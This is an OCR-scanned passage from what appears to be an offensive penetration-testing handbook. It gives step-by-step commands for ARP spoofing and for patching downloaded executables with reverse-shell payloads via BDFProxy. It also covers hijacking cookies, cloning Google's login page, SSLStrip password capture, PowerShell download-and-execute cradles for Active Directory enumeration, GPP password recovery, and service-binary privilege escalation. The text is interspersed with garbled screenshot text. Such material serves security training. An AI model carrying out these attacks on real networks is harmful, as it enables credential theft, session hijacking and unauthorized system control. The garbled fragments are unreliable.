Generally, ARP is used as either a last resort or for a very specific test. There are times when I will 
do one, but be aware that there is generally a good chance that you will affect end users and possibly 
cause disruptions on the network. So make sure you have a great grasp on ARP Spoofing before 
performing them on an engagement. 


For those that haven't had too much experience with ARP Poisoning, let's review what it does. ARP 
Poisoning is a common Man in the Middle (MITM) attack that takes advantage of the insecure nature 
of ARP, specifically the transition from OSI layer 2 (MAC address) to OSI layer 3 (IP address). 
Basically, in a simple scenario, there is a network with a router (ROUTE A), a legitimate host 
(HOST A), and an attacker (HOST B). To poison these hosts, the attacker sends an unsolicited ARP 
reply to the ROUTE A with the IP address of HOST A, but with their own HOST B MAC address. 
Then, the attacker sends an unsolicited ARP reply to HOST A with the IP address of ROUTE A, but 
again with their own HOST B MAC address. At this point, the router now thinks the attacker's MAC 
address belongs to HOST A, and HOST A thinks the attacker's MAC address belongs to 
ROUTE A. Ultimately, this will route all of HOST A's traffic through HOST B before going to the 
router,  bidirectionally. This could lead to manipulation of traffic, sniffing for 
passwords/cookies/kerberos keys, and more. If you want to see why ARP spoofing works, you can 
read more about it from: 


Cain and Abel 
( ) (Windows) 


Download: http://www.oxid.it/cain. html 
Operating System: Windows 


Let's see how we can ARP spoof our victim using Cain and Abel. To successfully ARP spoof in Cain, 
click on the sniffer button at the top-left, then click the sniffer tab and select the Scan MAC Address 
button. 


Clear Promiscuous-Mode Results 


Export 





Cain and Abel Scanning MAC Addresses 


Next, drop into the ARP tab at the bottom of Cain, select ARP on the left column, and click the "Plus" 
sign at the top bar (one thing to note is that the + button might not be visible. Try to click in the middle 
pane to enable that button). 
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APR List 


This should bring up the IPs from the previous scan and allow you to select the host to ARP Spoof 
and the gateway IP. 
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APR Poison Routing 


Lastly, click on the APR Poisoning start/stop button located at the top menu bar and you are all set. 
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Successful Poisoning 


Now that we have a full MITM ARP Poisoning, we can go look for clear text passwords. You can do 
this by going to the Passwords tab at the bottom of the screen and selecting HTTP or any other clear 
text protocol. 
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HTTP Clear Text 


There are many different attacks which can be performed with a full ARP spoof. I will show you a 
couple more examples in this chapter, but I will leave it up to you to figure out what is most 
appropriate for your test. 


Ettercap 
(http://ettercap.github.io/ettercap/) (Kali Linux) 


Download: http://ettercap.github.io/ettercap/ 
Operating System: Kali Linux 


If you favor Linux for providing your ARP spoofing attacks, the old school way is to do this using 
Ettercap. The basic ARP spoof command is: 


e ettercap -TqM arp: remote /10.0.1.1/ /10.0.1.7/ 


This command will perform an ARP spoof against 10.0.1.7 and the gateway 10.0.1.1 using the text 
interface (T) in quiet mode (q) and perform a MITM (M). This means that all of the traffic from 
10.0.1.7 will flow from your computer to the gateway and you will see all of the victim user's traffic. 


If you want to see the traffic natively, you can sniff using tcpdump or Wireshark. 
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Ettercap 


Note that there are a lot of different plugins with ettercap and it is very beneficial to understand what 
they do. Once you are within an ettercap MITM attack, you can press the letter "P" to see all of the 


different modules you can load. By pressing "P", you should see the following. 


Example of available plugins: 


[0] arp cop 1.1 Report suspicious ARP activity 

[0] autoadd 1.2 Automatically add new victims in the target range 
[0] chk poison 1.1 Check if the poisoning had success 

[0] dns spoof 1.1 Sends spoofed dns replies 

[0] finger 1.6 Fingerprint a remote host 


[0] finger submit 1.0 Submit a fingerprint to ettercap's website 

[0] remote browser 1.2 Sends visited URLs to the browser 

[0] search promisc 1.2 Search promise NICs in the LAN 

[0] smb clear 1.0 Tries to force SMB cleartext auth 

[0] smb down 1.0 Tries to force SMB to not use NTLM2 key auth 
[0] smurf attack 1.0 Копа smurf attack against specified hosts 


[0] sslstrip 1.1 SSLStrip plugin 

[0] stp mangler 1.0 — Become root of a switches spanning tree 

My favorite attack to perform is the dns spoof. This allows you to control where your victim goes on 
the Internet. For example, if they go to Gmail, you can redirect the DNS request to point to a web 
server you own and capture the credentials. 


If you want to see this attack in action against software updates, visit my blog post at 
https://www.securepla.net/dont-upgrade-your-software/ where I discuss how to use this in 
combination with Evilgrade to take advantage of poor update implementation processes. But why stop 
there? 


Backdoor Factory Proxy 
(https://github.com/secretsquirrel/BDFProxy)(Kali Linux) 


BDFProxy (https://github.com/secretsquirrel/BDFProxy) is a tool that patches executables with user 
shellcode and allows the executable to perform normally. BDF will write shellcode into empty 
spaces and call hooks to that code. The best part is that it works automatically on Windows, OS X, 
and Linux. So as long as we can redirect a victim's traffic through our host, we can manipulate the 
executable before the user receives it. 


e First, we need to modify the config file to include the address of our attacking 
machine: 
o gedit /etc/bdfproxy/bdfproxy.cfg 


‘| *bdfproxy.cfg 

CompressedFiles = True #True/False 
{{ {LinuxIntel x86] ]] 
SHELL = reverse shell tcp # This is the BDF syntax 
# The C2 
PORT = 8888 
SUPPLIED SHELLCODE = None 
MSFPAYLOAD = linux/x86/shell reverse tcp # MSF 

syntax 


BDF Configuration File 


e Run BDF Proxy: 
o bdfproxy 
e BDFProxy will create a metasploit resource file. In a new terminal window, input: 
o msfconsole -r /usr/share/bdfproxy/bdfproxy msf resource.rc 
e We also need to configure our firewall to forward all http traffic through the 
mitmproxy: 
o sysctl -w net.ipv4.ip_forward=1 
o iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j 
REDIRECT --to-port 8080 
e Lastly, we need to configure the victim host to route through our machine using 


arpspoofing (you can find this by arp -a): 
o arpspoof -i eth0 -t «victim ip^ «gateway ip> 
o arpspoof -i eth0 -t «gateway ip» «victim ip^ 
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BDF Patching Binary Executables 


After the file is patched and downloaded, the unknowing victim executes the file. This will spawn off 
either a Meterpreter Shell or just a normal shell based on the type and configuration. In the example 
below, a victim downloaded a normal WinRAR installer and since it did not do any integrity 
checking, we were able to successfully patch the executable. Once executed, the file opens up a shell 
on our Metasploit listener. 
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Steps After Arp Spoofing: 





If you successfully ARP-spoofed your victim, you pretty much control where the victim goes, what 
they see, what protocols they might use, and see any passwords that might be passed in clear. Let's 
see some examples which take advantage of these attacks. 


Side Jacking: 

From a high-level view, sidejacking is the process of sniffing the traffic, looking for session tokens 
(cookies), and using those tokens to authenticate as the user. Remember that HTTP is a stateless 
protocol. That means it has to use other methods to track your session without a username/password 
authentication for every page on a web application. After you authenticate the first time, a session 
token will be generated for the whole session and now the token is essentially your authentication 
pass. If that session cookie is compromised, an attacker can take those session tokens, import them 
into their own browser and become you. If you are still unfamiliar with sidejacking, you can visit this 
link for more information: 


http://www.pcworld.com/article/209333/how to hijack facebook using firesheep.html. 


Hamster/Ferret (Kali Linux) 

Hamster is a tool that allows for these sidejacking attacks. It acts as a proxy server which replaces 
your cookies with session cookies stolen from somebody else, allowing you to hijack their sessions. 
Cookies are sniffed using the Ferret program. 


How to run Hamster/Ferret: 
e First, we enable IP forwarding: 
o echo "1" > /proc/sys/net/ipvA/ip forward 
e We then modify IP tables for SSL Strip: 
o iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j 
REDIRECT --to-port 1000 
e Next, we configure and run SSL Strip: 
О sslstrip -f -a -k -1 1000 -w /root/out.txt & 
e Next, we need to enable ARP spoof (remember this will ARP spoof everyone on the 
network): 
o arpspoof -i eth0 [gateway] 
e Next, we need to enable Ferret. In a new terminal window: 
o ferret -i ethO 
e And finally enable Hamster. In a new terminal window: 
o hamster 


Now, you just need to wait for a victim to go to a website, authenticate or be authenticated, and for 
their cookies to be sniffed. Once you feel you have obtained their cookies, look at the hamster.txt file 
that was created. In the case below, we see that the victim's Reddit cookies were stolen, and these are 
the session tokens that show up in the right-side of the image below. 
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= [00:00:29:83:36: 18], protos"DHCP", ops"Redualua: 55550728 
кар РЧ 72.16. ы 133] |, mac acaddr=[00: 0c 29:03:35: 
diea , 1p*11/2.19, 133.199]. Instance: 172.16. 130.164 
90; КОЗҮ, protos"DRCP", Ea as Donain: www, reddi t con 
ТАГУ Hostnanes"win/-54-ViCparh 'apl/request prono 
Са [00:00 :29:bb:23:77], Systems Windows 2k, [^h -utnz , 
url unen code-b Value: 5565 306327404.1.1.utacsr={ 
аб" He pipes 0:4 <H р ipyba [РЕН 9] Bee fees SE 
, Multicast -groups=[224.0.C1nstance: 172.16. 139,164 
Domain: www reddit, coi 
0 txqueuelen: 1000 Path: Гарі ШЕ, Т proio 
улес 83061496 (79,2 MiB) ТХ bytes:13603632 (1779 MiNamer reddit session 


а a 


errupt:19 Base address :Ôx202 


к encap:Local Loopback 

t àddr:127,8,0.1 Mask:255.0.0.6 

t6 addr: ::1/128 Scope:Host 

LOOPBACK b NG БЫЛ tric: 

packets: 1265363 errors: :B overruns: frame: 
packat s: 1265363 € errors кын; 9 overruns:0 carrier:ü 


bytes: 199859777 TE T" ТХ bytes: 190859777 (182.0 MiB) 


arpspoof 


Hamster Results 





With the Reddit session tokens, let's see how we can use them to gain access as that user. I copy the 
reddit session value information and add that into my browser by using a cookie that mimics the 
cookie we stole. I then refresh the page. 


We will use the Firefox Web Developer Add-on which we installed during the setup to analyze and 
add our cookies. We can drop down in the Cookies Menu and click Add Cookie. As you can see 
prior to adding the cookie, I am currently not logged in as any user. After adding a reddit session 
cookie and adding the proper values, I click OK. 


Мате: — reddit session 
Value: — 23870237X2C2013-12- 1I T221A L SEJAS ENG 


reddit.com 


redditor's Special: Subscribe to The Eco 
promoted by redditads 
comment share save hide report _ Secure Cookie 


| Cancel || 


iw! Session cookie 


Economist 


= | My secret santa sent me a Shalligatou 





Replacing Cookies 


Refreshing the page, it looks like we were able to gain access to this account (image below) without 
ever knowing the password! Remember that I am in no way attacking Reddit's site or servers at all. 
The only thing I am doing is sniffing the clear-text traffic, pulling out the cookies, and replacing my 
cookies with those that were sniffed on a network I own. 





Rated 95% Fantastic by SentralGamer.Com 


innovative releases on the App Store" 
promoted by LCDNinja 
comment share save hide report 





My secret santa sent me a Shalligatouse 
Thanks crespokid! (тот! 


Becoming the Victim User 





Firesheep 
I won't talk much about Firesheep since it is an older tool and similar to the example above; however, 


I just want to point out that the concept still exists today. You can read a little more about it here: 
http://codebutler.com/firesheep/. Firesheep is an add-on tool to Firefox which sniffs the wireless or 
wired networks for session tokens passed in clear. In your browser window, it presents a framed 
page where you can click on a user you captured and become that user instantly. You don't have to 
add any of your own cookies manually, but it only works for a limited number of sites. 


The originating problem is that when session cookies do not have the Secure Flag set and protocol is 
not over HTTPS, then there is a possibility that the cookies will be passed in clear. How do you 
check if your cookies are secure? I will first log into my own website and then take a look at my 
cookies. I am using the web-developer add-on for Firefox to do this. 


(a > 25 » YY ps:/ /www.securepla. net/\ wiki/index.php7title=Main_Page 







— e =a > 


Add Cookie... 


Delete Domain Cookies 
secure (S Delete Path Cookies 


Delete Session Cookies » Planet WIKI. 


View Cookie Information 


navigation ide] 
= Main page 1 Security Awareness 


sec1135808350179 mw. session 


7db3def9c23c711 13def9c23c7 7dbb7ce 





Host www.securepla.net 
Path / 

Expires At end of session 
Secure No 

HttpOnly Yes 


Cookie Information and Secure Cookie 


In the image above, the mw session token, which is used to keep state for the user, is passed with the 
secure flag off. If the application at any time references information on that page over HTTP or if an 
attacker can force the victim to visit www.securepla.net over HTTP, the attacker will have the full 
session token and be able to take advantage of the user's access. 


DNS Redirection: 

If I have a successful MITM within a corporation, one attack that is usually fruitful is to clone the 
intranet page (or any page that requires authentication), then use it for DNS redirection. This is an 
easy way to get usernames and passwords. Let's see a quick example: 


We already know how to configure Cain and Abel to MITM systems in a network from a prior 
example. We will assume you already have a victim routing through you. The next step is to modify 
and spoof DNS requests that happen through the MITM. 


Under the Sniffer top tab and APR bottom tab, click on APR-DNS. Here you can right-click and add 
DNS requests that you want to modify. As mentioned before, I will usually pick an intranet page 
requiring authentication, but in this case, I will spoof Google and their authentication. 
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APR-SSH-T (0) 
APR-HTTPS (130) 

9 APR-ProxyHTTPS (0) 

T APR-ROP (0) 
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The second thing to do is set up a fake page to grab credentials. To clone the site, I generally use the 
Social Engineering Tool (SET) kit (I will go through a more detailed example later on in the Social 
Engineering Section). Once running within the SET Menu, go to: 1 - Social Engineering Attacks, 2 - 
Website Attack Vectors, 3 - Credential Harvester Attack Method, 2 - Site Cloner. 

In this case, I am going to clone https://accounts.google.com/ServiceLogin, which is the universal 
login page for Google, Gmail, Google+, etc. This is configured on a Kali box that has an IP of 
192.168.0.85. 


Cloning Google's Authentication Page 


We have now configured our DNS spoof and set up a fake page. When the ARP-Spoofed victim 
decides to go to google.com, they will be redirected to our SET-cloned webpage. Any usernames and 
passwords will be printed to our screen and users will then be redirected to the real Google page to 
make it look like the user typed the wrong password. 


le Accounts. 


Google 


One account. All of Google. 


Sign in with your Google Account 





Spoofed Google Authentication Page and Victim's Passwords 


SSLStrip: 
SSL strip is a tool developed by Moxie Marlinspike that redirects a user from an HTTPS page to an 


HTTP site, so that all traffic can be sniffed in clear text. I would first watch Moxie's talk at Blackhat 
(https://www.youtube.com/watch?v=MFol6IMbZ7Y). The tool monitors HTTPS traffic and rewrites 
all HTTPS communication to HTTP (clear text) from the user. 


Commands on Kali: 
e echo "1" > /proc/sys/net/ipvA/ip forward 
e iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to- 
port 8080 
e sslstrip -1 8080 
e ettercap -TqM arp: remote /192.168.0.12/ /192.168.0.1/ 


In this case, we are spoofing the requests from 192.168.0.12 and the gateway at 192.168.0.1. 


ettercap 0.7.6 


t change tcr eanent at ior m ы 
t chang 





SSL Strip 


When your victim (192.168.0.12) goes to facebook.com, it will not redirect to the HTTPS version of 
Facebook for the authentication. In the example below, the user goes to Facebook and types their 
username and password. If we go back to the ettercap terminal, we will see the username and 
password scroll through. 
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Facebook helps you connect and share with Sign Up For Facebook 


the people in your life. It's free and always will be 





Victim Visiting Facebook.com and Redirected to HTTP and Captured Passwords 


For IPv6 attacks look at parasite6 in the THC-IPv6 toolkit: 
( ). 


With Any Domain Credentials (Non-Admin): 


Initial System Recon 


So you have compromised your first couple of systems on the SUCK network. The question I get 
asked the most is: What’s next? What do I need to do to get more information about the 
system/network and eventually get to the domain admin? You might be on a Window’s host and might 


use these few standard queries to get an idea of the environment. 


Windows Enumeration: 
At this point we should know the basic commands like ipconfig, netstat, whoami, etc. to find the basic 
system information. I have compiled most of the basic ones in a single Windows command line: 
e whoami /all && ipconfig /all && netstat -ano && net accounts && net localgroup 
administrators && net share 


But usually for a penetration tester, this isn’t enough. Before we escalate privileges, we need to 
understand our end system and network much better. 


By now, you know that PowerShell is extremely powerful in a Windows environment, especially for 
a penetration tester. The following commands are strictly PowerShell scripts that are enabled by 
default on all Windows 7 OS’es and higher. 


e Check Window Patches 
© Most client machines in a network generally have similar patch 
levels. Therefore, compromising a single host will give you an idea of 
what other machines will look like. This is where you can start 
targeting attacks for applications, browsers, etc. 
© powershell.exe -command Get-HotFix 

e Display All AD Users and Associated Information 
© Powershell.exe -NoP -Nonl -Exec Bypass IEX (New-Object 
Net. WebClient).DownloadString('https://raw.githubusercontent.com/ch 
Get-NetUser 
o Powershell.exe -NoP -Nonl -Exec Bypass IEX (New-Object 
Net. WebClient).DownloadString('https://raw.githubusercontent.com/ch 
Get-UserProperties -Properties name,memberof,description,info 
o wmic useraccount get /ALL /format:csv 

e Enable Remote Desktop (requires administrative privileges) 
о set-ItemProperty -Path 
"HKLM: \System\CurrentControlSet\Control\Terminal Server'-name 
"fDenyTSConnections" - Value 0 

e Enable Firewall for Remote Desktop 
о Enable-NetFirewallRule -DisplayGroup "Remote Desktop" 

e Add a firewall rule 
© powershell.exe -command New-NetFirewallRule -DisplayName 
“Allow Inbound Port 80" -Direction Inbound —LocalPort 80 -Protocol 
TCP -Action Allow 
© powershell.exe -command New-NetFirewallRule -DisplayName 
"Block Outbound Port 80" -Direction Outbound —LocalPort 80 - 
Protocol TCP -Action Block 


e View all services 
© powershell.exe -command Get-Service 

e Restart service 
© powershell.exe -command Restart-Service 

e Configure the DNS server 
О powershell.exe -command Get-Service Set- 
DNSClientServerAddress -InterfaceAlias "Ethernet" - 
ServerAddresses 8.8.8.8 

e Get a Process Listing 
© powershell.exe -command Get-Process 
© wmic process get caption,executablepath,commandline /format:csv 

e Get a list of all computers from Active Directory 
o Powershell.exe -NoP -Nonl -Exec Bypass IEX (New-Object 
Net. WebClient).DownloadString('https://raw.githubusercontent.com/ch 
Get-NetComputers 

e Collection of information from the system, registries, and other information 
о Powershell.exe -exec bypass IEX "(New-Object 
Net. WebClient).DownloadString('https://raw.githubusercontent.com/ch 
Information.ps1'); Get-Information 


Logged in users: 

C:\Windows\s ystem32\conf ig\systemprof ile 
C:\Windows\ServiceProf iles\LocalService 
C:\Windows\ServiceProf iles\NetworkService 
C:\Users\cheetz 


Powershell environment: 
Install 
PID 


Putty trusted hosts: 
dss@22:securepla.net 
rs a2@443 : іпбекпеє-ѕсап . сот 
к5а2(222:192.168.222.129 
rsa2@22:thehackerplaybook.com 
rsa2@22:lethalsecurity.com 


Putty saved sessions: 


Recently used commands: 


Shares on the machine: 





e Search the network for which computers the Domain Admins are using: 
o Powershell.exe -NoP -Nonl -Exec Bypass IEX (New-Object 
Net. WebClient). DownloadString(‘https://raw.githubusercontent.com/chi 


Invoke-Userhunter 
e Find out which computer a specific AD user is on. In this example, we will look for 
the domain user *domainA" who is a domain administrator: 
o Powershell.exe -NoP -Nonl -Exec Bypass IEX (New-Object 
Net. WebClient).DownloadString('https://raw.githubusercontent.com/ch 
Invoke-UserHunter -UserName "domainA" 


G:\Usersi+Powershell.exe -NoP -Nonl -Exec Bypass [EA (New-Ohject 
“UserHunter -UserName "domain" | 
1+1 Running UserHunter on domain win/.hacker.testlab with delay 


Using target user "domain"... 


Total number of hosts: 744 


Target user “domain” has a session оп win/.hacker.test lab 
Target user "domain" logged into win?.hacker.test lab (192 
larget user “domaini™ logged into win?.hacker.test lab (192 





e Finding Open Shares: Once on a domain machine, you want to poke around to 
what’s near you and see what users are sharing. This will download PowerView and 
search AD for hostnames and query those machines for open shares. From the output 
below, it looks like we have access to the admin shares and full c drives of three 
different hosts. 
o Powershell.exe -NoP -NonlI -W Hidden -Exec Bypass IEX (New- 
Object 
Net. WebClient).DownloadString('https://raw.githubusercontent.com/ch 
"Invoke-ShareFinder -ExcludeIPC -ExcludePrint -CheckShareAccess | 
Out-File -Encoding ascii found. shares.txt" 
o And when we read found shares.txt 
o >type found shares.txt 
\\win7_123.hacker.testlab\ADMIN$ - Remote 
Admin 
\\win7_123.hacker.testlab\C$ - Default share 
\\win7_123.hacker.testlab\Users - 


Wwin7 125.hacker.testlabVADMINS - Remote 
Admin 

\\win7_125.hacker.testlab\C$ - Default share 
Wwin8 100.hacker.testlabVADMINS - Remote 
Admin 


\\win8_100.hacker.testlab\C$ - Default share 
\\win8_100.hacker.testlab\Users - 
\\win8_101.hacker.testlab\ADMIN$ - Remote 


Admin 
\\win8_101.hacker.testlab\C$ - Default share 
e What if you want to see all the open shares on your network? Generally open shares 
or files shares have tons of goodies stored in them. These can include configuration 
files, passwords, sensitive documents and more. Invoke-Netview, part of the 
PowerTools suite, is a tool that queries the domain for all hosts, and retrieves open 
shares, sessions, and users that are logged on for each host. Original functionality was 
implemented in the netview.exe tool released by Rob Fuller (@mubix). Note that this 
script takes a long time as it tries to connect to every share and is very loud on the 
network. 
о Powershell.exe -exec bypass IEX "(New-Object 
Net. WebClient). DownloadString(‘https://raw.githubusercontent.com/ch 
Invoke-Netview 
e Another great module of PowerView is the ability to get a list of all Active 
Directory users and the associated information with their accounts. 
о Powershell.exe -exec bypass IEX "(New-Object 
Net. WebClient). DownloadString(‘https://raw.githubusercontent.com/ch 
Get-UserProperties -Properties name,memberof,description,info" 
e Automate post exploitation information gathering? Try Nishang’s Get- 
Information.ps 1 
о Powershell.exe -exec bypass IEX "(New-Object 
Net. WebClient).DownloadString('https://raw.githubusercontent.com/ch 
Information.ps1');Get-Information" 


The command completed successfully. 


Account Policy: 
Force user logoff how long after time expires?: 
Minimum password age <days): 


ry maintained: 


ion (minutes): 
servation window <minutes)>: 38 
Computer role: PRIMARY 
The command completed successfully. 


Local users: 


User accounts for \\WIN-BLN6UGERSUN 


adnmin_account Administrator bobsmith 
donainadnin Guest krbtqt 
prart ian 

The command completed successfully. 


Local Groups: 


Aliases for \\WIN-BLN6UGERSUN 
“ficc ount Operators 


“Backup Ope 
"Cert Publish 
"Certificate Service DCOM ficcess 
“Cr yptogré aphic Operators 
LP ication Group 


"G 

*IIS. IUSRS 

«Incoming Forest Trust Builders 
t ‹ Operators 


"Perfornanc 
“Performance Monitor Us ers 
“Pre-Windows 2000 Compat ible Access 


“Terminal Server License Servers 
“Users 

“Windows Authorization Acc Group 
The command completed successfully. 


WLAN Info: 
The following command was not found: wlan show all. 





C:\Users\nishang 2>Powershell —ExecutionPolicy bypass -file Get—Information.ps1 


Other Common Non-Powershell Post Exploitation Commands: 
ө Get Local Windows Accounts 


© wmic useraccount get /ALL /format:csv 
e Find Domain Controllers: 

o nltest /DCLIST: [Domain] 
e List Domain Admins and Local Admins: 

© net group “Domain Admins” /domain 

О net localgroup administrators /DOMAIN 


Domain Trusts 

HarmJOy has been doing great work this year. One thing that he has been diving into is Windows 
domain trusts. From an offensive perspective, after compromising the first host, you should 
understand the type of infrastructure they use. This means that in large environments, the Active 
Directory environment may have multiple relationships with different Domains. {12} 


We used PowerView throughout the book for the multitude of tools that are incorporated in this 
PowerShell toolbag. One of these tools that helps infiltrate large organization is called Invoke- 


MapDomainTrusts. Running this command will show the relationship between the different domain 
trusts. 


For example: 
e Powershell.exe -exec bypass IEX "(New-Object 
Net. WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo. 
Invoke-MapDomainTrusts | Export-CS V -NoTypelInformation trusts.csv" 

The output: 


hacker.testlab,it.hacker.testlab,ParentChild,BiDirectional 
hacker.testlab,corp.hacker.testlab, ParentChild,BiDirectional 
corp.hacker.testlab,corp.alice.com,External, Inbound 
it.hacker.testlab,hacker.testlab,ParentChild,Bidirectional 
engineering. hacker.testlab,hacker.testlab,ParentChild, Bidirectional 
rockets.testlab,product.rockets.testlab, ParentChild, Bidirectional 
rockets.testlab,it.rockets.testlab, ParentChild, Bidirectional 


To find information about members of a given local group: 
e Powershell.exe -exec bypass IEX "(New-Object 
Net. WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo. 
Get-NetLocalGroup -HostName it.rockets.testlab. 


ше this all comes from harmjOy, I would hi ghly recommend you read: 





Group Policy Preferences: 


In the last book, a great and inexpensive “domain user to local admin privilege escalation trick" was 
through Group Policy Preferences. Group Policy Preferences vulnerabilities have been patched in the 
newest Windows version, but it should be one of the first things to check. 


Group Policy Preferences is a powerful feature to make a sysadmin's life much easier by deploying 
GPO settings within the whole environment. One of the features is that you can create/update local 
admin accounts to all the hosts within the domain. Why would someone use this feature? It might be 
because they want to push a new administrative local user onto every host or update the password for 
a local account on every machine (more common than you might think). Once this setting is configured 
and GPOs are updated, all workstations will now have this account. The problem is that this 
information (username/password of local admin account) has to be stored somewhere and in GPP's 
case they are stored on the domain and readable by any AD user account. Even worse was that the 
encrypted AES key protecting these passwords was posted on Microsoft's site, allowing anyone to 
reverse the passwords. {13} 


If you are on a host that is authenticated to the network with any domain user, you can use the 
Metasploit modules with the following: 

e use post/windows/gather/credentials/gpp 

e set SESSION [Session £ of your shell] 

e exploit 


This would get you a lot of easy cheap local administrative credentials, but after the Windows patch, 
I don't see this as often. 
ө https://github.com/rapid7/metasploit- 
framework/blob/master/modules/post/windows/gather/credentials/gpp.rb 
e https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Ge 
GPPPassword.ps1 
Or if you don’t have a shell, just mount: \\[Domain Controller]\SYSVOL\| Domain]\Policies, look for 
the Groups.xml file, and decrypt the hash using: 


http://esec-pentest.sogeti.com/public/files/gpprefdecrypt.py. 


OS X Enumeration 


(https://github.com/Yelp/osxcollector)(OS X): 
OS X and Linux detailed post exploitation guides are listed below. In addition to those guides, I 


wanted to integrate how incident response techniques can support penetration testers. Yelp created a 
tool called OSXCollector, which is a forensic evidence collection and analysis toolkit for OS X. 
This tool is used to speed up incidents and investigations on compromised Macs. As a penetration 
tester, we can use these same tools to perform our information gathering automation. Let’s see this in 
action: 


e curl "https://codeload.github.com/ Yelp/osxcollector/zip/master" -o osxcollector.zip 
e unzip osxcollector.zip 

e cd osxcollector-master/osxcollector 

e sudo python osxcollector.py 


admins-MacBook-Pro:osxcollect-2015 04 22-23 28 08 admin$ ls -alh 

total 319408 

drwxr-xr-x 16 admin staff 5448 Apr 22 23:45. 

drwxr-xr-x8 7 admin staff 2388 Apr 22 23:39 .. 

-rWw-r--r-- 1 admin staff 3.4K Apr 22 23:39 LKDC-setup. log 

-rw-r--r-- 1 admin staff 347B Apr 22 23:39 VMware Fusion Services. 109 
-rw-r--r-- 1 admin staff 155M Apr 22 23:39 osxcollect-2015 04 22-23 28 08.json 
-DIW-r--r-- 1 admin staff 08 Apr 22 23:39 stackshot-syms. 109 
-rw-r--r-- 1 admin staff 0B Арг 22 23:39 stackshot. log 

-rw-r--r-- 1 admin staff 264K Apr 22 23:39 system. log 

-rw-r--r-- 1 admin staff 6.5K Apr 22 23:39 system. 109.0.92 

-fw-r--r-- 1 admin staff 35K Apr 22 23:39 system. 109.1.92 

-rw-r--r-- 1 admin staff 55K Apr 22 23:39 system. log.2.gz 

-rw-r--r-- 1 admin staff 22K Apr 22 23:39 system. 109.3.92 

-fIw-r--r-- 1 admin staff 43K Apr 22 23:39 system. log.4.gz 

-rW-r--r-- 1 admin staff 37K Apr 22 23:39 system. log.5.gz 

-rw-r--r-- 1 admin staff 47K Apr 22 23:39 system. log.6.9z 

-rw-r--r-- 1 admin staff 47K Арг 22 23:39 system. 109.7.92 


OSXCollector Output 


After the OSXCollector finishes, a tar gz file is created with the date timestamp. Extracting the tar gz 
file (tar xzvf osxcollect-*.tar.gz), we see a file output similar to above. These contain all the system 
log files, but more importantly is the json file. What is in the json file: 

e Full browser information (history, cookies, login data, etc) 

e Information about the LaunchAgents, LaunchDaemons, ScriptingAdditions, 

StartupItems and other login items 

e Information from Mail and more 

e User accounts 

e For full detail see: 


https://github.com/Yelp/osxcollector 


Why is this important to a red team? Inside this json files I have found passwords, session cookies, 
sensitive web browsing data, certificate data, and much more. Luckily, you can do most of this 
investigation offline and reuse cookies to log into sensitive websites. 


Additional Post Exploitation Tips 


Rob Fuller (Mubix) and room362.com have very comprehensive lists on additional Post Exploitation 
Post Exploitation Lists from Room362.com: (14j 

e Linux/Unix/ BSD Post Exploitation: http://bit.ly/pqJxA5 

e Windows Post Exploitation: http://bit.ly/lem7gvG 

e OSX Post Exploitation: http://bit.ly/1kVTIMf 

e Obscure System's Post Exploitation: http://bit.]y/ 18d vLOI 

e Metasploit Post Exploitation: http://bit.ly/JpJ1TR 


Privilege Escalation: 


If you end up in an environment with restrictive users, you might have issues moving laterally or 
performing elevated attacks. Without being an administrative user on a host, you are limited in pulling 
hashes, installing software, changing firewall rules, modifying the registry and more. I have dedicated 
a quick section for getting from a regular user to a local administrator in this Zero to Hero section. 


Zero to Hero - Windows: 

After the initial compromise, one of the biggest issues 1s moving from a regular user to an 
administrative user. With a regular user, you lack the ability to make modifications to the registry, 
install software, bypassUAC, pull hashes, and most of all become system. 

In the prior chapter, we talked about looking at open shares for password lists or for configuration 
files. In this section, we will discuss how to look for vulnerabilities and issues on the host system to 
get to system. 


As a member of the users group with no administrative privileges, we need to look for 


misconfigurations. What are the things we might look for? 


Option 1: 

The first common privilege escalation I see are services files that have misconfigured privileges. We 
know that services files execute at bootup and call an executable to run in the background. For 
example, think of Java updater. This runs every time you boot up and checks Oracle to see if you have 
the latest version of Java. It is always running and generally running at a privileged local account. 


This means if an executable that is called by a service is writeable by a limited user, we can replace 
it with a file we created, which will allow our new file to execute as system every time the service 
Starts. 


Luckily for us, harmjOy created a tool called PowerUp to look for these issues: 


( | ). 


To run PowerUp, we will use the standard PowerShell command to download and execute the 
Invoke-Allchecks: 
e  powershell -Version 2 -nop -exec bypass IEX (New-Object 
Net.WebClient). DownloadString(‘https://raw.githubusercontent.com/cheetz/PowerToo 
Invoke-AllChecks 
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PowerUp Example 


We see that the service omniserv is vulnerable to the Write-ServiceEXE issue. How can we confirm 
that we have the ability to write to C:\Program Files\Fingerprint Manager Pro\OmniServ.exe? 


There is a default Windows program called icacls to view file permissions. For example, running 
icacls on this file, we would see an output of: 
e icacls "C:\Program Files\Fingerprint Manager Pro\OmniServ.exe" 
C:\Program Files\Fingerprint Manager Pro\OmniServ.exe 
Everyone:(D(F) 
NT AUTHORITY\SYSTEM:(1)(F) 
BUILTIN'Administrators:(I)(F) 
BUILTIN\Users:(I)(RX) 
laptop\testaccount: (1)(F) 
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION 
PACKAGES:(D(RX) 


For this file, we can see that Everyone has (F) or full access to modify this executable. If we can 
replace this service file with another service executable, we can potentially take advantage of system 
privileges. 
e  powershell -Version 2 -nop -exec bypass IEX (New-Object 
Net. WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo 
Write-ServiceEXE -ServiceName omniserv -Username newaccount -Password 
Asdfasdfl -Verbose 


Username newaccount »Password 
VERBOSE: Backing up “C:\Program Files \Fingerprint Manager Pro\OnniSery.éxe’ to ‘C:\Program Files\Fingerprint Manager 
ro\OaniSery.exe, bak’ 
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Vulnerable Service File 


If possible, you can try to stop and start the service, but in this case, due to being a limited user, we 
need to wait for a reboot to occur. To force a reboot, we can push this command: 
e shutdown -r -f -t 0 


After a reboot or an administrative account starting and stopping of the service, a new account called 
“newaccount” and Password of *Asdfasdfl" is created with Administrative Privileges. Just log back 
in and you are now a local admin. 


Administrator: Command Prompt 





e| 2 XS i9 | В (5 
as : General Member Of | Profile 
® Local Users || Name Full Name ^ 
: Member of: 
ы € V, Administrator 
C] Groups S; Guest @ Administrators 


U 
A helpdesk dig Users 


a newaccount 
